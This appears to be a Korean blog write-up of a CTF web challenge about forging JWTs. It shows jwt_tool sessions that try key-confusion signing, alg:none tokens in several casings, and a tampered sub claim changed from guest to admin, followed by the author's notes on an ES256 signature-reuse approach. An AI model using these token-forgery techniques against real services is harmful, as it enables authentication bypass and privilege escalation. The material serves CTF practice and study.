python3 eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJndWVzdCJ9.wFkVBMFFYKFY2eC2PBPC9fN1nyypfMIudI6lmrgQJBNQKFxw-SZHbhVlz7i1R_ufsUujq85bZUU7G_GL2VnoLQ -X k -pk /Users/koharin/.jwt_tool/jwttool_custom_public_EC.pem
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.6 \______| @ticarpi
Original JWT:
File loaded: /Users/koharin/.jwt_tool/jwttool_custom_public_EC.pem
jwttool_174d67fd7ae4a50c2e15d629a872fb6f - EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJndWVzdCJ9.Vx_ateaSdzCE5s4HNrJU4pW1UKsHoj6ugmnkhRbvd7w
python3 jwt_tool/ eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJndWVzdCJ9.JHLYb9VnzZGvewxi1S5OyJi6pEw161wcUVJqHquIS2xOvCIgrAO85v9jpGscLXcNh54a5P4XZiulOBIPSAhaQA -T -S es256
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.6 \______| @ticarpi
Original JWT:
This option allows you to tamper with the header, contents and
signature of the JWT.
Token header values:
[1] alg = "ES256"
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
Token payload values:
[1] sub = "guest"
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 1
Current value of sub is: guest
Please enter new value and hit ENTER
> admin
[1] sub = "admin"
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
jwttool_f28d1067c75a67087eb82593ebeaeacd - Tampered token - EC Signing:
[+] eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJhZG1pbiJ9.k67d4GGzcmQyb_bLXjeLpnTyQ_K1j5-b0y3KzjWtk2etRnvDvZZhTHCqtojUTZDGulr7cl3XmCO_BNJT4UDfKQ
jwttool_e4966bb08199b70d934f637e95dd03e7 - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_47de7d0e3c6a526cc79028ac02644778 - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_f2bdddbc37c4a885a9ead149be5db4f6 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_1b0f6745c5519a32f768a554c0b8d1e3 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool에서 제공하는 익스플로잇 코드나 alg가 none인 여러 경우에 대해 생성된 jwt를 테스트해봤을 때 다 안 됐다.
위 익스플로잇 코드는 제공되는 jwt 기반으로 유추를 하고 jwt 키를 생성하는 풀이(?)라서 문제 상황에 맞게 고쳐서 해봤는데, 역시 안 됐다.
ES256 알고리즘에서의 jwt 관련한 원데이를 사용할 수 있는 문제인가? 싶어서 구글링을 해서
이 링크까지는 대회 때 찾았다. 근데 poc를 안 찾아봄,,,
위 링크에서 header.body.signature 키가 있는데, header, signature는 그대로 사용하고 body만 sub: admin일 때를 주면 된다..
[LINE CTF 2024] jalyboy-baby (0) | 2024.03.24 |
[HackCTF] 보물 (0) | 2022.01.07 |
[HackCTF] Button (0) | 2022.01.07 |
[HackCTF] / (Web) (0) | 2022.01.07 |
[HackCTF] Hidden (0) | 2021.05.03 |